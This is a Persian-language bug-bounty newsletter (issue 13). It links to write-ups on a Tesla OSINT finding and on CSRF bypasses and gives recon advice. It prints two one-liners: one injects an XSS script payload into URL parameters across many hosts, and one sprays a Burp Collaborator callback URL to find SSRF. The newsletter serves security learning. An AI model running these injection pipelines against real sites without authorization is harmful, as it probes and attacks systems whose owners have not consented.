شماره 13 غیر رسمی

سلام بهروزم و با شماره 13 غیر رسمی در خدمتتون هستم.

غیر رسمی شماره 13 مربوط به تاریخ 27 آبان تا 3 آذر 1402 هستش.

آسیب پذیری Tesla

زمانی که دوره جامع اوسینت را منتشر کردم خیلی از بچه ها پیام میدادن که آیا برای هک و امنیت هم مناسبه؟

ببینید اوسینت یک مهارته. مهارتی که می تونه در زمینه های مختلف کاربرد داشته باشه.

برای نمونه اینجا موردی را داریم که از اوسینت برای پیدا کردن یک آسیب پذیری در تسلا استفاده شده.

سلام بر عاشقان csrf

یه دوستی داشتم عاشق این آسیب پذیری بود. رضا اگر این مطلب رو داری می خونی سلام 🙂 

این مقاله خوراک افرادیه که می خوان از این آسیب پذیری استفاده کنن.

چون یاد مگیرن که با چه بایپس هایی می تونن برای این آسیب پذیری کار کنن.

اتوماتیک کردن فرایندها

یادتون باشه که خیلی از آسیب پذیری هارو میشه به صورت اتوماتیک بررسی کرد.

نه این که دیگه روش تست دستی رو ببوسیم و کنار بگذاریم.

ولی روش های اتوماتیک خیلی وقت ها جواب میدن.

برای نمونه برای آسیب پذیری xss این دستور:

cat file.txt | gf xss |
grep ‘source=’ | qsreplace
‘”><script>confirm(1)</script>’ | while read host do ; do
curl –silent –path-as-is –insecure “$host” | grep -qs
“<script>confirm(1)” && echo “$host
33[0;31mVulnerablen”;done

و برای آسیب پذیری ssrf از این دستور استفاده کنید:

findomain -t example.com -q | httpx -silent -threads 1000 | gau | grep “=” | qsreplace http://YOUR.burpcollaborator.net

وقتی می خوایم روی یه سایت کار کنیم از کجا شروع کنیم؟

این هفته هم مثل هفته گذشته بد نیست جواب یه سوال پر تکرار رو بدیم.

قبلاً چندین جا گفتم که شما باید برای خودتون یه متدولوژی داشته باشید.

این که مثلاً برای شروع چه کارهایی رو انجام بدید.

مثل یه مسیر که به ترتیب انجام بدید و تیک بزنید.

اینجا همون هانتر که مقاله گزارش باگ در واب رو گذاشته بود در موردش توضیح داده.

البته این پارت اول هستش و احتمالا در آینده پارت های بعدی رو قرار میده که کافیه از پروفایلش در medium بقیه رو دنبال کنید.